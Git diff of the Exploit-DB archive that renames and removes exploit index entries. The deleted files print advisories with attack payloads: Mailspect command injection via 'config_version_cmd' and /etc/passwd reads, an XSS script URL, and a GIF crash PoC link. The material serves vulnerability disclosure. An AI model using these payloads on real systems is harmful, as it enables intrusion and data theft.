G0M3S",multiple,remote,0 35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 - \'src\' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 -35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80 -35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80 +35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 +35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 @@ -31932,7 +31920,7 @@ id,file,description,date,author,platform,type,port 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 - (.avi) Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 -35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 +35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 35451,platforms/php/webapps/35451.txt,"BoutikOne categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35452,platforms/php/webapps/35452.txt,"BoutikOne list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -32124,7 +32112,7 @@ id,file,description,date,author,platform,type,port 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x - 'email' Parameter Cross-Site Scripting Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting Vulnerability",2011-04-26,KedAns-Dz,php,webapps,0 -35660,platforms/php/remote/35660.rb,"ProjectSend Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 +35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting Vulnerability",2011-04-26,"High-Tech Bridge SA",php,webapps,0 @@ -32154,7 +32142,7 @@ id,file,description,date,author,platform,type,port 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0 35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 -35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 +35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 @@ -32458,7 +32446,7 @@ id,file,description,date,author,platform,type,port 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 -36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0 +36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC (1)",2015-02-09,"Samandeep Singh",windows,dos,0 36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0 36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 @@ -32487,10 +32475,10 @@ id,file,description,date,author,platform,type,port 36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 -36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-02-11,"dogo h@ck",windows,local,0 +36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (2)",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection Vulnerability",2015-02-11,Vulnerability-Lab,php,webapps,8080 -36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow",2015-02-11,metasploit,windows,remote,9256 +36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 @@ -32857,7 +32845,7 @@ id,file,description,date,author,platform,type,port 36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 -36437,platforms/windows/local/36437.rb,"Publish-It PUI Buffer Overflow (SEH)",2015-03-19,metasploit,windows,local,0 +36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,metasploit,windows,local,0 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins Remote Code Execution",2015-03-19,metasploit,php,remote,80 36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection Vulnerabilities",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 @@ -33010,11 +32998,11 @@ id,file,description,date,author,platform,type,port 36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0 -36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 -36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 -36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 -36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 -36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 36610,platforms/php/webapps/36610.txt,"WordPress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80 36611,platforms/php/webapps/36611.txt,"Multiple UpThemes WordPress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 @@ -33214,7 +33202,7 @@ id,file,description,date,author,platform,type,port 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 36852,platforms/php/webapps/36852.txt,"TestLink Multiple SQL Injection Vulnerabilities",2012-02-20,"Juan M. Natal",php,webapps,0 36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80 -36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0 +36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (3)",2015-04-22,"Tomislav Paskalev",windows,local,0 36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 @@ -33608,7 +33596,7 @@ id,file,description,date,author,platform,type,port 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 -37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0 +37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 @@ -33870,7 +33858,7 @@ id,file,description,date,author,platform,type,port 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 -37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-07-15,"Pedro Ribeiro",windows,webapps,0 +37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 @@ -34631,7 +34619,7 @@ id,file,description,date,author,platform,type,port 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38349,platforms/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow Exploit",2015-09-29,cor3sm4sh3r,windows,local,0 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421_ 04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 -38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-09-29,"Pedro Ribeiro",asp,webapps,0 +38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Ubuntu Apport - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 @@ -34809,7 +34797,7 @@ id,file,description,date,author,platform,type,port 38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 -38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 @@ -35271,7 +35259,6 @@ id,file,description,date,author,platform,type,port 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 -39023,platforms/android/dos/39023.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-12-17,"Google Security Research",android,dos,0 39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0 @@ -35461,7 +35448,7 @@ id,file,description,date,author,platform,type,port 39217,platforms/linux/local/39217.c,"Amanda <= 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0 39218,platforms/windows/remote/39218.html,"TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 -39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-01-11,"Google Security Research",windows,dos,0 +39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 39221,platforms/win64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win64,dos,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection Vulnerability",2014-06-05,"Lukas Zapletal",multiple,remote,0 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0 @@ -35976,7 +35963,7 @@ id,file,description,date,author,platform,type,port 39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0 39776,platforms/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0 39777,platforms/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",asp,webapps,80 -39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-05-06,"Google Security Research",windows,dos,0 +39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (2)",2016-05-06,"Google Security Research",windows,dos,0 39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0 39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443 39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80 diff --git a/platforms/android/dos/39023.txt b/platforms/android/dos/39023.txt deleted file mode 100755 index bccc807e4..000000000 --- a/platforms/android/dos/39023.txt +++ /dev/null @@ -1,31 +0,0 @@ -Source: https://code.google.com/p/google-security-research/issues/detail?id=500 - -There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif. - -D/skia (10905): GIF - Parse error -D/skia (10905): --- decoder->decode returned false -F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0) -I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<< -I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac -I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c -I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048 -I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758 -I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f -I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00 -I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001 -I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080 -I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64 -I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000 -I/DEBUG ( 2958): -I/DEBUG ( 2958): backtrace: -I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200) -I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340) -I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436) -I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex - -To reproduce, download the file and open it in Gallery - - -Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip - diff --git a/platforms/cgi/remote/20938.txt b/platforms/cgi/remote/20938.txt index e2091ce91..ccc8a2b2a 100755 --- a/platforms/cgi/remote/20938.txt +++ b/platforms/cgi/remote/20938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/exploit +source: http://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/platforms/cgi/remote/20939.txt b/platforms/cgi/remote/20939.txt index 7c5ed8951..b74df818f 100755 --- a/platforms/cgi/remote/20939.txt +++ b/platforms/cgi/remote/20939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/exploit +source: http://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/platforms/cgi/webapps/33895.txt b/platforms/cgi/webapps/33895.txt deleted file mode 100755 index 9b5d718ed..000000000 --- a/platforms/cgi/webapps/33895.txt +++ /dev/null @@ -1,147 +0,0 @@ -Document Title: -============ -Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities - -Release Date: -=========== -June 21, 2014 - -Product & Service Introduction: -======================== -Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched -in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin. - -Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently, -the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in -content filers and reputation engines. - -Abstract Advisory Information: -======================= -BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel -4.0.5 web application. - -Vulnerability Disclosure Timeline: -========================= -May 4, 2014 : Contact with Vendor -May 16, 2014 : Vendor Response -June 21, 2014 : Public Disclosure - -Discovery Status: -============= -Published - -Affected Product(s): -=============== -Multilayered Email Security & Archive for Gateways, MTA's & Servers -Product: Mailspect Control Panel 4.0.5 -Other versions may be affected. - -Exploitation Technique: -================== -RCE: Remote, Authenticated -AFR: Remote, Authenticated -XSS: Remote, Unauthenticated - -Severity Level: -=========== -High - -Technical Details & Description: -======================== -1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami > -/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to -"status_info.cgi?group=default" page. -Other parameters with the suffix "_cmd" are probably vulnerable. - -2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary -file name like "/etc/passwd" will cause the file's content's disclosure. - -3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd" -will cause the file's content's disclosure. - -4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to ">js to be executed - - - - -XSS Exploitation: - -The following POC code exploits a reflective XSS vulnerability using the HTTP POST method. - - -Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb - - - - -
- - - - - - - - - - -"The later" Exploitation: - -Coming soon... : ) diff --git a/platforms/php/webapps/27303.txt b/platforms/php/webapps/27303.txt index b05a4fb24..0750e9d37 100755 --- a/platforms/php/webapps/27303.txt +++ b/platforms/php/webapps/27303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16794/ +source: http://www.securityfocus.com/bid/16794/info Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/platforms/php/webapps/31216.txt b/platforms/php/webapps/31216.txt index cd1a95b1d..098623d6b 100755 --- a/platforms/php/webapps/31216.txt +++ b/platforms/php/webapps/31216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27830/ +source: http://www.securityfocus.com/bid/27830/info The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/platforms/unix/remote/32890.txt b/platforms/unix/remote/32890.txt deleted file mode 100755 index b831534d4..000000000 --- a/platforms/unix/remote/32890.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/34383/info - -The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/local/10107.pl b/platforms/windows/local/10107.pl deleted file mode 100755 index 120d474f3..000000000 --- a/platforms/windows/local/10107.pl +++ /dev/null @@ -1,39 +0,0 @@ 